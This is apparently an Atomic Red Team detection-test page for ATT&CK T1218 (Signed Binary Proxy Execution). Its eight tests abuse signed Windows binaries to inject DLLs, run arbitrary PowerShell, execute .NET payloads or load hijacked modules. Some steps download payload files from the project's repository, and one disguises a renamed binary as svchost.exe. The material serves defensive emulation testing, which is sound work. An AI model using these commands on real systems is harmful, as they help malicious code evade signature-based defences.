T1218.md

T1218 - Signed Binary Proxy Execution

Description from ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

Atomic Tests

• Atomic Test #1 - mavinject - Inject DLL into running process

• Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

• Atomic Test #3 - Register-CimProvider - Execute evil dll

• Atomic Test #4 - InfDefaultInstall.exe .inf Execution

• Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File

• Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution

• Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions

• Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test

Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
process_id	PID of process receiving injection	string	1000
dll_payload	DLL to inject	Path	PathToAtomicsFolder\T1218\src\x64\T1218.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 

Get Prereq Commands:

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"

Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
powershell_code	PowerShell code to execute	string	Start-Process calc.exe

Attack Commands: Run with command_prompt!

SyncAppvPublishingServer.exe "n; #{powershell_code}"

Atomic Test #3 - Register-CimProvider - Execute evil dll

Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
dll_payload	DLL to execute	Path	PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 

Get Prereq Commands:

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"

Atomic Test #4 - InfDefaultInstall.exe .inf Execution

Test execution of a .inf using InfDefaultInstall.exe

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
inf_to_execute	Local location of inf file	string	PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe #{inf_to_execute}

Dependencies: Run with powershell!

Description: INF file must exist on disk at specified location (#{inf_to_execute})

Check Prereq Commands:

if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 

Get Prereq Commands:

New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"

Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
remote_url	url to document	url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx

Attack Commands: Run with command_prompt!

FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"

Dependencies: Run with powershell!

Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided

Check Prereq Commands:

if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} 

Get Prereq Commands:

write-host "Install Microsoft Word or provide correct path."

Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution

Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
xml_payload	XML to execution	path	PathToAtomicsFolder\T1218\src\T1218.xml
mwcpath	Default location of Microsoft.Workflow.Compiler.exe	Path	C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname	Default name of microsoft.workflow.compiler.exe	Path	microsoft.workflow.compiler.exe

Attack Commands: Run with powershell!

#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.

Check Prereq Commands:

if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} 

Get Prereq Commands:

write-host ".Net must be installed for this test to work correctly."

Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions

Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
xml_payload	XML to execution	path	PathToAtomicsFolder\T1218\src\T1218.xml
renamed_binary	renamed Microsoft.Workflow.Compiler	path	PathToAtomicsFolder\T1218\src\svchost.exe
mwcpath	Default location of Microsoft.Workflow.Compiler.exe	Path	C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname	Default name of microsoft.workflow.compiler.exe	Path	microsoft.workflow.compiler.exe

Attack Commands: Run with powershell!

#{renamed_binary} #{xml_payload} output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.

Check Prereq Commands:

Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} 

Get Prereq Commands:

write-host "you need to rename workflow complier before you run this test"

Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.

Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
module_name	Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified.	string	foo
module_path	Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules.	string	$PWD

Attack Commands: Run with powershell!

Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}

Dependencies: Run with powershell!

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.

Check Prereq Commands:

$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} 

Get Prereq Commands:

Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force